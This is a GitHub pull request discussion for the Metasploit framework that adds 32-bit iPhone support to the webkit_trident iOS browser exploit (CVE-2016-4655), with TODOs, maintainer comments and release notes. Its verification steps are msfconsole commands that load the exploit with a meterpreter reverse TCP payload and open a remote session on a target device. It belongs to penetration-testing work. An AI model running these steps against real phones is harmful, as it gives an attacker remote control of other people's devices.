New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Support 32bit iPhones on the webkit_trident exploit #10812

Merged
merged 16 commits into from Feb 7, 2019

Conversation

Projects
None yet
3 participants
@timwr
Copy link
Contributor

timwr commented Oct 15, 2018

This change adds support for 32bit iPhones (e.g iPhone 5C) on the trident exploit.
It's still work in progress, with a few TODOs to remove.

TODO

  • Fix iOS model/version detection in external/source/exploits/CVE-2016-4655/exploit32.c
  • Remove the hard-coded memcpy offset in external/source/exploits/CVE-2016-4655/exploit32.c
  • Find a way to transfer the mettle payload
  • Fix rapid7/mettle#140
  • Fix rapid7/mettle#141

Verification

List the steps needed to make sure this thing works

  • Fix TODO
  • Build external/source/exploits/CVE-2016-4655 (e.g run make install32)
  • Start msfconsole
  • use exploit/apple_ios/browser/webkit_trident
  • set payload apple_ios/armle/meterpreter_reverse_tcp
  • set LHOST YOUR_LHOST
  • set LPORT 4444
  • run
  • ...
  • Verify you get a meterpreter session

@timwr timwr force-pushed the timwr:webkit_trident_cleanup branch from d3a9cb7 to 96ba3c6 Oct 16, 2018

@timwr

This comment has been minimized.

Copy link
Contributor Author

timwr commented Oct 16, 2018

@timwr timwr referenced this pull request Oct 16, 2018

Closed

Code-signing the iOS builds #141

@timwr timwr removed the delayed label Oct 21, 2018

@timwr

This comment has been minimized.

Copy link
Contributor Author

timwr commented Oct 21, 2018

This should be ready for testing. I've pushed a debug binary with logging enabled.

@timwr timwr force-pushed the timwr:webkit_trident_cleanup branch from 2667bcf to 4177ff4 Oct 22, 2018

@busterb busterb self-assigned this Nov 21, 2018

@timwr

This comment has been minimized.

Copy link
Contributor Author

timwr commented Feb 4, 2019

Bump. Do we have a device to test this on?
Mines an iPhone 5C on 9.3.2 but something different would be better.

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Feb 7, 2019

I have a 32-bit iPad.

@timwr

This comment has been minimized.

Copy link
Contributor Author

timwr commented Feb 7, 2019

Nice! Definitely worth pinging me on slack/hangouts before you start testing. It would be a miracle if this works the first time.

@busterb busterb merged commit 4177ff4 into rapid7:master Feb 7, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Feb 7, 2019

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Feb 7, 2019

I went ahead and landed with the testing I had done locally, plus the mettle payloads bump that brings in the new dylib payload variant needed for the new payloads here.

jmartin-r7 added a commit that referenced this pull request Feb 7, 2019

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Feb 15, 2019

Release Notes

This adds support for 32bit iPhones (e.g iPhone 5C) with the apple_ios/browser/webkit_trident exploit module. It also adds new 32-bit iOS dylib payload types.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment